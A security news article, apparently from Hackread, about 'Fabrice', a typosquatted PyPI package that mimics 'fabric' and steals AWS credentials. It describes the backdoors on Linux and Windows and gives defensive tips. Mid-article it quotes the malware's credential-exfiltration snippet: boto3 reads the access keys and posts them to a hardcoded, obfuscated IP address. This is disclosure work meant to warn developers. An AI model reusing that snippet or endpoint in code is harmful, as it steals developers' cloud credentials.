Fabrice Malware on PyPI Has Been Stealing AWS Credentials for 3 Years


The malicious Python package “Fabrice” on PyPI mimics the “Fabric” library to steal AWS credentials, affecting thousands. Learn how it works and protect your projects with smart security practices.

Cybersecurity researchers at Socket Security have identified a malicious Python package named “Fabrice” on the Python Package Index (PyPI), which has been actively harvesting Amazon Web Services (AWS) credentials from unsuspecting developers for the past three years.

This package, which mimics the legitimate and widely-used “fabric” library for SSH command execution has over 202 million downloads, the malicious version has been downloaded over 37,000 times since it surfaced in 2021.

Typosquatting

The malicious Fabrice package is designed to exploit the trust associated with the genuine “fabric” library. This technique is called typosquatting in which scammers take advantage of situations in which users mistype the name of the popular “fabric” package.

The malware includes payloads that steal credentials, install backdoors, and execute additional platform-specific scripts. The scammers behind the package are particularly interested in Amazon Web Services (AWS) credentials. Currently, the attackers are targeting users and developers on Windows and Linux devices.

Targeting Linux and Windows Devices

On Linux, the malware creates hidden directories within the user’s home directory to store and run scripts downloaded from a remote server. These scripts are designed to hide their activity, making detection quite difficult.

On Windows, it uses VBScript to run hidden Python scripts, which in turn download malicious executables. These executables are then scheduled to run repeatedly, assuring persistence on the infected system. The malware also attempts to delete its initial entry point to cover its tracks.

Stolen Credentials Sent to Paris

In its report shared with Hackread.com ahead of publishing, both methods lead to the extraction of AWS credentials, sending them to a server located in Paris, operated by M247, a VPN service provider. This could allow attackers to abuse these credentials for unauthorized access to cloud resources. What’s worse, the campaign remains active despite researchers’ alerts to PyPI.

Example of AWS Credential Exfiltration

session = boto3.Session()
cd = session.get_credentials()
ak = cd.access_key
sk = cd.secret_key
data = {"k": ak, "s": sk}
muri = "ht"+"tp"+":"+"//89.44.9.227/akkfuifkeifsa"
requests.post(muri, json=data, timeout=4

“Recognizing the severe risk fabrice poses, our team has proactively reported it to the PyPI team for takedown to safeguard the broader developer community. It is still live at the time of publishing.”

Socket Security

Expert Comment

Rom Carmel, Co-Founder and CEO of Identity Security platform Apono weighed in on the latest development stating, Malicious actors continue to find success by putting malicious software packages out into the developer community, playing a numbers game that a percentage of developers will make the very human mistake of choosing the wrong package for their code.

While methods like improving security awareness education and implementing processes for secure coding can go a long way in helping developers to make more secure decisions as we see with phishing, security teams need to take steps to secure their organizations from an assumed breach approach, Rom warned.

To protect your organization once credentials are compromised as we see on a near daily basis, we need to think in terms of defence in depth. That means implementing not only MFA but also reducing the blast radius from an account takeover in terms of the availability of access and the scope of privileges that attackers can use, he advised.

Additional Security Measures for Developers

Developers are the backbone of any project. The information that can be extracted from them can become a treasure trove if it falls into the wrong hands. Lately, Python developers, in particular, have been heavily targeted by threat actors. Here are some tips to protect your data and accounts from hackers and malware attacks:

  • Stay Informed: Keep yourself up-to-date about security advisories from platforms like PyPI. Community reports and security research blogs can be valuable in staying protected against threats like Fabrice.
  • Double-check for typosquatting: Always double-check the names of packages before installation. Look for signs of typosquatting like slight misspellings or unusual publisher names.
  • Use Security Tools: Employ tools like Socket for GitHub, which provides real-time monitoring and security checks for dependencies in your projects. Such tools can automatically detect and alert suspicious activities or known malicious packages.
  • Regular Security Audits: Regularly review and audit the software dependencies of your projects. Make sure that all packages are from trusted sources and serve a legitimate purpose.
  • Follow Hackread.com: Most importantly, follow Hackread.com.
  1. Why is learning Python important in Data Science?
  2. 6 official Python repositories plagued with cryptomining malware
  3. PythonAnywhere Cloud Platform Abused for Hosting Ransomware
  4. NTLM Credential Theft in Python Apps Threaten Windows Security
  5. Python in Threat Intelligence: Analyzing – Mitigating Cyber Threats





Source link